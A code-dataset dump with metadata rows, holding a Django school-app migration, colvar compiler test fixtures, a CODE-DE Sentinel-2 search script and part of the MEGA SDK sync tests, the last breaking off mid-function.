| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 868857252402b155eb59e8b6ad1e32e2e1c11cad
| 3,587
| py
| Python
| student_management_app/migrations/0001_initial.py
| VictorCampelo/iSchool
| 809eaa993924b5bc0bf2b748c3f8cd4ecf00bc12
| ["MIT"] | null | null | null
| student_management_app/migrations/0001_initial.py
| VictorCampelo/iSchool
| 809eaa993924b5bc0bf2b748c3f8cd4ecf00bc12
| ["MIT"] | null | null | null
| student_management_app/migrations/0001_initial.py
| VictorCampelo/iSchool
| 809eaa993924b5bc0bf2b748c3f8cd4ecf00bc12
| ["MIT"] | null | null | null
|
# Generated by Django 3.0.5 on 2020-04-18 18:36
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Class',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=255)),
('email', models.EmailField(max_length=254)),
('password', models.CharField(max_length=255)),
('create_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Director',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('username', models.CharField(max_length=255)),
('email', models.EmailField(max_length=254)),
('password', models.CharField(max_length=255)),
('create_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Root',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('username', models.CharField(max_length=255)),
('email', models.EmailField(max_length=254)),
('password', models.CharField(max_length=255)),
('create_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Teacher',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('username', models.CharField(max_length=255)),
('email', models.EmailField(max_length=254)),
('password', models.CharField(max_length=255)),
('create_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Subject',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=255)),
('create_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now_add=True)),
('class_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='student_management_app.Class')),
('teacher_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='student_management_app.Teacher')),
],
),
migrations.CreateModel(
name='Student',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('username', models.CharField(max_length=255)),
('email', models.EmailField(max_length=254)),
('password', models.CharField(max_length=255)),
('create_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now_add=True)),
('subject', models.ManyToManyField(to='student_management_app.Subject')),
],
),
]
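# --- Example (editor's sketch) ---------------------------------------------
# A hedged reconstruction of models that could have generated the migration
# above; the app's real models.py may differ. Note that update_time uses
# auto_now_add=True in the migration, so it is only set at creation time; a
# modification timestamp would normally use auto_now=True instead.
from django.db import models

class Class(models.Model):
    name = models.CharField(max_length=255)
    email = models.EmailField(max_length=254)
    password = models.CharField(max_length=255)
    create_time = models.DateTimeField(auto_now_add=True)
    update_time = models.DateTimeField(auto_now_add=True)

class Teacher(models.Model):
    username = models.CharField(max_length=255)
    email = models.EmailField(max_length=254)
    password = models.CharField(max_length=255)
    create_time = models.DateTimeField(auto_now_add=True)
    update_time = models.DateTimeField(auto_now_add=True)

class Subject(models.Model):
    name = models.CharField(max_length=255)
    create_time = models.DateTimeField(auto_now_add=True)
    update_time = models.DateTimeField(auto_now_add=True)
    class_id = models.ForeignKey(Class, on_delete=models.CASCADE)
    teacher_id = models.ForeignKey(Teacher, on_delete=models.DO_NOTHING)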
| 43.216867
| 135
| 0.563145
| 342
| 3,587
| 5.704678
| 0.181287
| 0.073808
| 0.141466
| 0.166069
| 0.79959
| 0.79959
| 0.79959
| 0.79959
| 0.79959
| 0.750384
| 0
| 0.02503
| 0.298299
| 3,587
| 82
| 136
| 43.743902
| 0.750099
| 0.012545
| 0
| 0.773333
| 1
| 0
| 0.112994
| 0.024859
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.066667
| 0.026667
| 0
| 0.08
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 9
| 86acf1a3790cee9e51f76da3d499ca13a6bd493f
| 20,125
| py
| Python
| tests/test_compilers.py
| kzinovjev/colvar
| 726a6f7d50b962bd3f935c033fef580188068525
| ["Apache-2.0"] | null | null | null
| tests/test_compilers.py
| kzinovjev/colvar
| 726a6f7d50b962bd3f935c033fef580188068525
| ["Apache-2.0"] | null | null | null
| tests/test_compilers.py
| kzinovjev/colvar
| 726a6f7d50b962bd3f935c033fef580188068525
| ["Apache-2.0"] | null | null | null
|
from colvar import compilers
def test_simple_distance():
raw = {
"type": "distance",
"atoms": [1, 2]
}
compiled = {
"type": "distance",
"params": {
"centers": [
[
{"type": "x", "params": {"index": 3}},
{"type": "x", "params": {"index": 4}},
{"type": "x", "params": {"index": 5}}
],
[
{"type": "x", "params": {"index": 6}},
{"type": "x", "params": {"index": 7}},
{"type": "x", "params": {"index": 8}}
]
]
}
}
assert compilers.compile_schema(raw) == compiled
def test_centers_distance_no_weights():
raw = {
"type": "distance",
"centers": [
{"atoms": [1, 2, 3]},
{"atoms": [5, 6]}
]
}
compiled = {
"type": "distance",
"params": {
"centers": [
[
{
"type": "linear",
"params": {
"colvars": [
{"type": "x", "params": {"index": 3}},
{"type": "x", "params": {"index": 6}},
{"type": "x", "params": {"index": 9}}
],
"weights": [
{"type": "constant", "params": {"value": 1}},
{"type": "constant", "params": {"value": 1}},
{"type": "constant", "params": {"value": 1}}
],
"normalize": True
}
},
{
"type": "linear",
"params": {
"colvars": [
{"type": "x", "params": {"index": 4}},
{"type": "x", "params": {"index": 7}},
{"type": "x", "params": {"index": 10}}
],
"weights": [
{"type": "constant", "params": {"value": 1}},
{"type": "constant", "params": {"value": 1}},
{"type": "constant", "params": {"value": 1}}
],
"normalize": True
}
},
{
"type": "linear",
"params": {
"colvars": [
{"type": "x", "params": {"index": 5}},
{"type": "x", "params": {"index": 8}},
{"type": "x", "params": {"index": 11}}
],
"weights": [
{"type": "constant", "params": {"value": 1}},
{"type": "constant", "params": {"value": 1}},
{"type": "constant", "params": {"value": 1}}
],
"normalize": True
}
}
],
[
{
"type": "linear",
"params": {
"colvars": [
{"type": "x", "params": {"index": 15}},
{"type": "x", "params": {"index": 18}}
],
"weights": [
{"type": "constant", "params": {"value": 1}},
{"type": "constant", "params": {"value": 1}}
],
"normalize": True
}
},
{
"type": "linear",
"params": {
"colvars": [
{"type": "x", "params": {"index": 16}},
{"type": "x", "params": {"index": 19}}
],
"weights": [
{"type": "constant", "params": {"value": 1}},
{"type": "constant", "params": {"value": 1}}
],
"normalize": True
}
},
{
"type": "linear",
"params": {
"colvars": [
{"type": "x", "params": {"index": 17}},
{"type": "x", "params": {"index": 20}}
],
"weights": [
{"type": "constant", "params": {"value": 1}},
{"type": "constant", "params": {"value": 1}}
],
"normalize": True
}
}
]
]
}
}
assert compilers.compile_schema(raw) == compiled
def test_weighted_distance():
raw = {
"type": "distance",
"centers": [
{"atoms": [1, 2, 3], "weights": [12, 12, 16]},
{"atoms": [5, 6], "weights": [1, 16]}
]
}
compiled = {
"type": "distance",
"params": {
"centers": [
[
{
"type": "linear",
"params": {
"colvars": [
{"type": "x", "params": {"index": 3}},
{"type": "x", "params": {"index": 6}},
{"type": "x", "params": {"index": 9}}
],
"weights": [
{"type": "constant", "params": {"value": 12}},
{"type": "constant", "params": {"value": 12}},
{"type": "constant", "params": {"value": 16}}
],
"normalize": True
}
},
{
"type": "linear",
"params": {
"colvars": [
{"type": "x", "params": {"index": 4}},
{"type": "x", "params": {"index": 7}},
{"type": "x", "params": {"index": 10}}
],
"weights": [
{"type": "constant", "params": {"value": 12}},
{"type": "constant", "params": {"value": 12}},
{"type": "constant", "params": {"value": 16}}
],
"normalize": True
}
},
{
"type": "linear",
"params": {
"colvars": [
{"type": "x", "params": {"index": 5}},
{"type": "x", "params": {"index": 8}},
{"type": "x", "params": {"index": 11}}
],
"weights": [
{"type": "constant", "params": {"value": 12}},
{"type": "constant", "params": {"value": 12}},
{"type": "constant", "params": {"value": 16}}
],
"normalize": True
}
}
],
[
{
"type": "linear",
"params": {
"colvars": [
{"type": "x", "params": {"index": 15}},
{"type": "x", "params": {"index": 18}}
],
"weights": [
{"type": "constant", "params": {"value": 1}},
{"type": "constant", "params": {"value": 16}}
],
"normalize": True
}
},
{
"type": "linear",
"params": {
"colvars": [
{"type": "x", "params": {"index": 16}},
{"type": "x", "params": {"index": 19}}
],
"weights": [
{"type": "constant", "params": {"value": 1}},
{"type": "constant", "params": {"value": 16}}
],
"normalize": True
}
},
{
"type": "linear",
"params": {
"colvars": [
{"type": "x", "params": {"index": 17}},
{"type": "x", "params": {"index": 20}}
],
"weights": [
{"type": "constant", "params": {"value": 1}},
{"type": "constant", "params": {"value": 16}}
],
"normalize": True
}
}
]
]
}
}
assert compilers.compile_schema(raw) == compiled
def test_linear():
raw = {
"type": "linear",
"colvars": [
{"type": "angle", "atoms": [1, 6, 7]},
{"type": "angle", "atoms": [3, 6, 7]},
{"type": "angle", "atoms": [4, 6, 7]},
{"type": "angle", "atoms": [5, 6, 7]}
],
"weights": [
{
"type": "sigmoid",
"colvar": {"type": "distance", "atoms": [1, 6]},
"L": 1,
"k": 10,
"x0": 1.5
},
{
"type": "sigmoid",
"colvar": {"type": "distance", "atoms": [3, 6]},
"L": 1,
"k": 10,
"x0": 1.5
},
{
"type": "sigmoid",
"colvar": {"type": "distance", "atoms": [4, 6]},
"L": 1,
"k": 10,
"x0": 1.5
},
{
"type": "sigmoid",
"colvar": {"type": "distance", "atoms": [5, 6]},
"L": 1,
"k": 10,
"x0": 1.5
}
],
"normalize": True
}
compiled = {
"type": "linear",
"params": {
"colvars": [
{
"type": "angle",
"params": {
"centers": [
[
{"type": "x", "params": {"index": 3}},
{"type": "x", "params": {"index": 4}},
{"type": "x", "params": {"index": 5}}
],
[
{"type": "x", "params": {"index": 18}},
{"type": "x", "params": {"index": 19}},
{"type": "x", "params": {"index": 20}}
],
[
{"type": "x", "params": {"index": 21}},
{"type": "x", "params": {"index": 22}},
{"type": "x", "params": {"index": 23}}
]
]
}
},
{
"type": "angle",
"params": {
"centers": [
[
{"type": "x", "params": {"index": 9}},
{"type": "x", "params": {"index": 10}},
{"type": "x", "params": {"index": 11}}
],
[
{"type": "x", "params": {"index": 18}},
{"type": "x", "params": {"index": 19}},
{"type": "x", "params": {"index": 20}}
],
[
{"type": "x", "params": {"index": 21}},
{"type": "x", "params": {"index": 22}},
{"type": "x", "params": {"index": 23}}
]
]
}
},
{
"type": "angle",
"params": {
"centers": [
[
{"type": "x", "params": {"index": 12}},
{"type": "x", "params": {"index": 13}},
{"type": "x", "params": {"index": 14}}
],
[
{"type": "x", "params": {"index": 18}},
{"type": "x", "params": {"index": 19}},
{"type": "x", "params": {"index": 20}}
],
[
{"type": "x", "params": {"index": 21}},
{"type": "x", "params": {"index": 22}},
{"type": "x", "params": {"index": 23}}
]
]
}
},
{
"type": "angle",
"params": {
"centers": [
[
{"type": "x", "params": {"index": 15}},
{"type": "x", "params": {"index": 16}},
{"type": "x", "params": {"index": 17}}
],
[
{"type": "x", "params": {"index": 18}},
{"type": "x", "params": {"index": 19}},
{"type": "x", "params": {"index": 20}}
],
[
{"type": "x", "params": {"index": 21}},
{"type": "x", "params": {"index": 22}},
{"type": "x", "params": {"index": 23}}
]
]
}
}
],
"weights": [
{
"type": "sigmoid",
"params": {
"colvar": {
"type": "distance",
"params": {
"centers": [
[
{"type": "x", "params": {"index": 3}},
{"type": "x", "params": {"index": 4}},
{"type": "x", "params": {"index": 5}}
],
[
{"type": "x", "params": {"index": 18}},
{"type": "x", "params": {"index": 19}},
{"type": "x", "params": {"index": 20}}
]
],
}
},
"L": 1,
"k": 10,
"x0": 1.5
}
},
{
"type": "sigmoid",
"params": {
"colvar": {
"type": "distance",
"params": {
"centers": [
[
{"type": "x", "params": {"index": 9}},
{"type": "x", "params": {"index": 10}},
{"type": "x", "params": {"index": 11}}
],
[
{"type": "x", "params": {"index": 18}},
{"type": "x", "params": {"index": 19}},
{"type": "x", "params": {"index": 20}}
]
]
}
},
"L": 1,
"k": 10,
"x0": 1.5
}
},
{
"type": "sigmoid",
"params": {
"colvar": {
"type": "distance",
"params": {
"centers": [
[
{"type": "x", "params": {"index": 12}},
{"type": "x", "params": {"index": 13}},
{"type": "x", "params": {"index": 14}}
],
[
{"type": "x", "params": {"index": 18}},
{"type": "x", "params": {"index": 19}},
{"type": "x", "params": {"index": 20}}
]
]
}
},
"L": 1,
"k": 10,
"x0": 1.5
}
},
{
"type": "sigmoid",
"params": {
"colvar": {
"type": "distance",
"params": {
"centers": [
[
{"type": "x", "params": {"index": 15}},
{"type": "x", "params": {"index": 16}},
{"type": "x", "params": {"index": 17}}
],
[
{"type": "x", "params": {"index": 18}},
{"type": "x", "params": {"index": 19}},
{"type": "x", "params": {"index": 20}}
]
]
}
},
"L": 1,
"k": 10,
"x0": 1.5
}
}
],
"normalize": True
}
}
assert compilers.compile_schema(raw) == compiled
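# --- Example (editor's sketch) ---------------------------------------------
# A small helper making the index convention in these fixtures explicit.
# Assumption inferred from the expected outputs above: a 1-based atom index i
# maps to flat coordinate indices 3*i, 3*i + 1, 3*i + 2 for x, y and z.
def atom_coordinate_schemas(atom):
    """Return the compiled x/y/z coordinate schemas for a 1-based atom index."""
    return [{"type": "x", "params": {"index": 3 * atom + axis}} for axis in range(3)]

assert atom_coordinate_schemas(1) == [
    {"type": "x", "params": {"index": 3}},
    {"type": "x", "params": {"index": 4}},
    {"type": "x", "params": {"index": 5}},
]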
| 40.25
| 79
| 0.203876
| 984
| 20,125
| 4.156504
| 0.056911
| 0.117359
| 0.258191
| 0.37555
| 0.946944
| 0.92934
| 0.919071
| 0.919071
| 0.881174
| 0.864303
| 0
| 0.04024
| 0.635727
| 20,125
| 499
| 80
| 40.330661
| 0.517665
| 0
| 0
| 0.677686
| 0
| 0
| 0.170634
| 0
| 0
| 0
| 0
| 0
| 0.008264
| 1
| 0.008264
| false
| 0
| 0.002066
| 0
| 0.010331
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 9
| 86d07f895dd835810de18bef46e58e0da03b43de
| 4,824
| py
| Python
| download/codede_query.py
| sebfoe/BDC
| 3a24fb994865483b1b53d39ef5d596bac193b4fd
| ["MIT"] | null | null | null
| download/codede_query.py
| sebfoe/BDC
| 3a24fb994865483b1b53d39ef5d596bac193b4fd
| ["MIT"] | null | null | null
| download/codede_query.py
| sebfoe/BDC
| 3a24fb994865483b1b53d39ef5d596bac193b4fd
| ["MIT"] | null | null | null
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Search for products on CODE-DE
"""
import requests
API_QUERY = "https://finder.code-de.org/resto/api/collections/\
Sentinel2/search.json?maxRecords=2000&startDate=2015-06-01T00%3A00%3A00Z&completionDate=2020-08-31T23%3A59%3A59Z&location=all&processingLevel=LEVEL2A&productType=L2A&sortParam=startDate&sortOrder=descending&status=all&geometry=MULTIPOLYGON(((10.075764399693792+50.7584800022297%2C12.857942844697517+50.11881493057439%2C13.26617381810968+49.29881963934912%2C14.217987338132907+49.22218442674205%2C14.300279271021745+48.11263889020893%2C13.109595651339728+48.095905408956725%2C13.301598637480263+47.3767477717403%2C9.935377441223283+47.33192184804318%2C9.648877768451609+49.76911209425333%2C8.795579731357476+49.83629725294199%2C8.342330582735308+50.162347132709186%2C9.421883063132148+50.266440862302375%2C10.075764399693792+50.7584800022297)))&dataset=ESA-DATASET"
#%%
API_search_string = "https://finder.code-de.org/resto/api/collections/"
API_search_platform = "Sentinel2"
API_search_max_rec = "2000" # 2000 maximum
API_search_start_date = "2015-06-01"
API_search_end_date = "2015-12-31"
# Mecklenburg-Vorpommern; TODO: add a method to load the shape from drive
#API_search_geometry = "geometry=MULTIPOLYGON(((10.075764399693792+50.7584800022297%2C12.857942844697517+50.11881493057439%2C13.26617381810968+49.29881963934912%2C14.217987338132907+49.22218442674205%2C14.300279271021745+48.11263889020893%2C13.109595651339728+48.095905408956725%2C13.301598637480263+47.3767477717403%2C9.935377441223283+47.33192184804318%2C9.648877768451609+49.76911209425333%2C8.795579731357476+49.83629725294199%2C8.342330582735308+50.162347132709186%2C9.421883063132148+50.266440862302375%2C10.075764399693792+50.7584800022297)))"
# bavaria
API_search_geometry = "geometry=MULTIPOLYGON(((10.075764399693792+50.7584800022297%2C12.857942844697517+50.11881493057439%2C13.26617381810968+49.29881963934912%2C14.217987338132907+49.22218442674205%2C14.300279271021745+48.11263889020893%2C13.109595651339728+48.095905408956725%2C13.301598637480263+47.3767477717403%2C9.935377441223283+47.33192184804318%2C9.648877768451609+49.76911209425333%2C8.795579731357476+49.83629725294199%2C8.342330582735308+50.162347132709186%2C9.421883063132148+50.266440862302375%2C10.075764399693792+50.7584800022297)))"
API_search_product = "L2A"
#%%
tester = (API_search_string + API_search_platform
          + "/search.json?maxRecords=" + API_search_max_rec
          + "&startDate=" + API_search_start_date
          + "&completionDate=" + API_search_end_date
          + "&" + API_search_geometry
          + "&productType=" + API_search_product)
#%%
#%%
#API_QUERY = "https://finder.code-de.org/resto/api/collections/Sentinel2/search.json?maxRecords=2000&startDate=2020-06-01T00%3A00%3A00Z&completionDate=2020-06-10T23%3A59%3A59Z&location=all&processingLevel=LEVEL2A&productType=L2A&sortParam=startDate&sortOrder=descending&status=all&geometry=MULTIPOLYGON(((10.075764399693792+50.7584800022297%2C12.857942844697517+50.11881493057439%2C13.26617381810968+49.29881963934912%2C14.217987338132907+49.22218442674205%2C14.300279271021745+48.11263889020893%2C13.109595651339728+48.095905408956725%2C13.301598637480263+47.3767477717403%2C9.935377441223283+47.33192184804318%2C9.648877768451609+49.76911209425333%2C8.795579731357476+49.83629725294199%2C8.342330582735308+50.162347132709186%2C9.421883063132148+50.266440862302375%2C10.075764399693792+50.7584800022297)))&dataset=ESA-DATASET"
totalResults = requests.get(API_QUERY + "&page=1").json()
nr = 1
page = 1
#%%
while True:
    try:
        result = requests.get(API_QUERY + "&page=" + str(page)).json()['features']
        page += 1
    except (requests.RequestException, KeyError, ValueError) as err:
        print('request failed:', err)
        break
    else:
        if result:
            for product in result:
                print(f"{product['properties']['productIdentifier']}")
                nr += 1
        else:
            break
print(f"number of records: {nr - 1}")
#%% query token june 01 to 10th June 2020 using geojson extents
# https://finder.code-de.org/resto/api/collections/Sentinel2/search.json?maxRecords=2000&startDate=2020-06-01T00%3A00%3A00Z&completionDate=2020-06-10T23%3A59%3A59Z&location=all&processingLevel=LEVEL2A&productType=L2A&sortParam=startDate&sortOrder=descending&status=all&geometry=MULTIPOLYGON(((10.075764399693792+50.7584800022297%2C12.857942844697517+50.11881493057439%2C13.26617381810968+49.29881963934912%2C14.217987338132907+49.22218442674205%2C14.300279271021745+48.11263889020893%2C13.109595651339728+48.095905408956725%2C13.301598637480263+47.3767477717403%2C9.935377441223283+47.33192184804318%2C9.648877768451609+49.76911209425333%2C8.795579731357476+49.83629725294199%2C8.342330582735308+50.162347132709186%2C9.421883063132148+50.266440862302375%2C10.075764399693792+50.7584800022297)))&dataset=ESA-DATASET
#%%
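# --- Example (editor's sketch) ---------------------------------------------
# A hedged alternative that lets requests build and URL-encode the query
# string instead of concatenating it by hand. Assumptions: the finder API
# accepts a `page` parameter (as the pagination loop above implies); the
# geometry parameter is omitted here for brevity.
import requests

BASE_URL = "https://finder.code-de.org/resto/api/collections/Sentinel2/search.json"
params = {
    "maxRecords": 2000,
    "startDate": "2020-06-01T00:00:00Z",
    "completionDate": "2020-06-10T23:59:59Z",
    "processingLevel": "LEVEL2A",
    "productType": "L2A",
    "sortParam": "startDate",
    "sortOrder": "descending",
    "page": 1,
}
features = requests.get(BASE_URL, params=params).json().get("features", [])
print(f"first page: {len(features)} products")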
| 67.943662
| 827
| 0.80908
| 561
| 4,824
| 6.885918
| 0.256684
| 0.034947
| 0.07766
| 0.04789
| 0.826301
| 0.814911
| 0.806109
| 0.806109
| 0.796013
| 0.796013
| 0
| 0.519351
| 0.067993
| 4,824
| 70
| 828
| 68.914286
| 0.339858
| 0.327322
| 0
| 0.125
| 0
| 0.0625
| 0.227586
| 0.185893
| 0
| 0
| 0
| 0.014286
| 0
| 0
| null | null | 0
| 0.03125
| null | null | 0.09375
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 10
| 86fe2e0c224a1ffc7e93ad40aca56d48703290c4
| 16,332
| py
| Python
| tests/sync_test.py
| lfcontato/meganz
| 59f3cd493acfcf7361cb6862f2e4a39fc4494e33
| ["BSD-2-Clause"] | null | null | null
| tests/sync_test.py
| lfcontato/meganz
| 59f3cd493acfcf7361cb6862f2e4a39fc4494e33
| ["BSD-2-Clause"] | null | null | null
| tests/sync_test.py
| lfcontato/meganz
| 59f3cd493acfcf7361cb6862f2e4a39fc4494e33
| ["BSD-2-Clause"] | null | null | null
|
"""
Base class for testing syncing algorithm
(c) 2013-2014 by Mega Limited, Wellsford, New Zealand
This file is part of the MEGA SDK - Client Access Engine.
Applications using the MEGA API must present a valid application key
and comply with the rules set forth in the Terms of Service.
The MEGA SDK is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
@copyright Simplified (2-clause) BSD License.
You should have received a copy of the license along with this
program.
"""
# TODO tests:
# * "pause" sync
# * lock directory
# * large (> 4Gb) files
# * > 10000 folders to synchronize
from sync_test_base import SyncTestBase
from sync_test_base import get_random_str
from sync_test_base import generate_unicode_name
import random
import os
import logging
import time
import math
class SyncTest(SyncTestBase):
"""
Class with MEGA SDK test methods
"""
# tests
def test_create_delete_files(self):
"""
        create files of different sizes,
        compare the files in both folders,
        remove the files, and check that they are removed from the second folder
"""
logging.info("Launching test_create_delete_files test")
self.assertTrue(self.app.is_alive(), "Test application is not running")
        self.app.change_folders()
# make sure remote folders are empty
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# create files
l_files = self.files_create()
self.assertIsNotNone(l_files, "Creating files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.sync()
# comparing
self.assertTrue(self.files_check(l_files), "Comparing files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# remove files
self.assertTrue(self.files_remove(l_files), "Removing files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# make sure remote folders are empty
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
return True
def test_create_rename_delete_files(self):
"""
        create files of different sizes,
        compare the files in both folders,
        rename the files, then remove them
"""
logging.info("Launching test_create_rename_delete_files test")
self.assertTrue(self.app.is_alive(), "Test application is not running")
        self.app.change_folders()
# make sure remote folders are empty
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# create files
l_files = self.files_create()
self.assertIsNotNone(l_files, "Creating files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.sync()
# comparing
self.assertTrue(self.files_check(l_files), "Comparing files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# renaming
self.assertTrue(self.files_rename(l_files), "Renaming files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.sync()
# comparing
self.assertTrue(self.files_check(l_files), "Comparing files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# remove files
self.assertTrue(self.files_remove(l_files), "Removing files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# make sure remote folders are empty
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
return True
def test_create_delete_dirs(self):
"""
        create directories with different numbers of files,
        compare the directories in both sync folders,
        remove the directories, and check that they are removed from the second folder
"""
logging.info("Launching test_create_delete_dirs test")
self.assertTrue(self.app.is_alive(), "Test application is not running")
        self.app.change_folders()
# make sure remote folders are empty
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# create dirs
l_dirs = self.dirs_create()
self.assertIsNotNone(l_dirs, "Creating directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.sync()
# comparing
self.assertTrue(self.dirs_check(l_dirs), "Comparing directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# remove files
self.assertTrue(self.dirs_remove(l_dirs), "Removing directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# make sure remote folders are empty
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
return True
def test_create_rename_delete_dirs(self):
"""
        create directories with different numbers of files,
        compare the directories in both sync folders,
        rename the directories,
        compare the directories in both sync folders again,
        remove the directories, and check that they are removed from the second folder
"""
logging.info("Launching test_create_rename_delete_dirs test")
self.assertTrue(self.app.is_alive(), "Test application is not running")
        self.app.change_folders()
# make sure remote folders are empty
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# create dirs
l_dirs = self.dirs_create()
self.assertIsNotNone(l_dirs, "Creating directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.sync()
# comparing
self.assertTrue(self.dirs_check(l_dirs), "Comparing directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# rename dirs
self.assertTrue(self.dirs_rename(l_dirs), "Rename directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.sync()
# comparing
self.assertTrue(self.dirs_check(l_dirs), "Comparing directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# remove files
self.assertTrue(self.dirs_remove(l_dirs), "Removing directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# make sure remote folders are empty
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
return True
def test_sync_files_write(self):
"""
        write data to a file located in both sync folders
        check the result; expected: both files contain the same content
"""
logging.info("Launching test_sync_files_write test")
self.assertTrue(self.app.is_alive(), "Test application is not running")
        self.app.change_folders()
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
for _ in range(0, self.nr_files):
self.assertTrue(self.app.is_alive(), "Test application is not running")
strlen = random.randint(10, 20)
fname = get_random_str(size=strlen)
fname_in = os.path.join(self.app.local_folder_in, fname)
fname_out = os.path.join(self.app.local_folder_out, fname)
logging.debug("Writing to both files: %s and %s" % (fname_in, fname_out))
with open(fname_in, 'a'):
os.utime(fname_in, None)
with open(fname_out, 'a'):
os.utime(fname_out, None)
#self.app.sync()
for _ in range(self.nr_changes):
with open(fname_in, 'a') as f_in:
f_in.write(get_random_str(100))
with open(fname_out, 'a') as f_out:
f_out.write(get_random_str(100))
for r in range(self.app.nr_retries):
                self.app.attempt = r
                md5_in = "INPUT FILE NOT READABLE"
                md5_out = "OUTPUT FILE NOT READABLE"
try:
md5_in = self.md5_for_file(fname_in)
md5_out = self.md5_for_file(fname_out)
except IOError:
                    pass
if md5_in == md5_out:
break
self.app.sync()
logging.debug("File %s md5: %s" % (fname_in, md5_in))
logging.debug("File %s md5: %s" % (fname_out, md5_out))
self.assertEqual(md5_in, md5_out, "Files do not match")
def test_local_operations(self):
"""
        create a local directory tree and sync it, then create, move and
        repeatedly rename folders, checking that both sync folders stay consistent
"""
logging.info("Launching test_local_operations test")
self.assertTrue(self.app.is_alive(), "Test application is not running")
        self.app.change_folders()
l_tree = self.local_tree_create("", self.nr_dirs)
self.assertIsNotNone(l_tree, "Failed to create directory tree!")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.sync()
self.assertTrue(self.local_tree_compare(l_tree), "Failed to compare directory trees!")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.assertTrue(self.local_tree_create_and_move(l_tree), "Failed to create a new sub folder and move an existing directory into it!")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.assertTrue(self.local_tree_multiple_renames(l_tree), "Failed to rename folder multiple times and then rename back to the original name!")
self.assertTrue(self.app.is_alive(), "Test application is not running")
def test_update_mtime(self):
"""
update mtime of a file in both local folders
"""
logging.info("Launching test_update_mtime test")
self.assertTrue(self.app.is_alive(), "Test application is not running")
        self.app.change_folders()
in_file = os.path.join(self.app.local_folder_in, "mtime_test")
out_file = os.path.join(self.app.local_folder_out, "mtime_test")
for _ in range(self.nr_time_changes):
logging.debug("Touching: %s" % in_file)
            now = math.floor(time.time())  # floor to get seconds
with open(in_file, 'a'):
os.utime(in_file, (now, now))
# with open(out_file, 'a'):
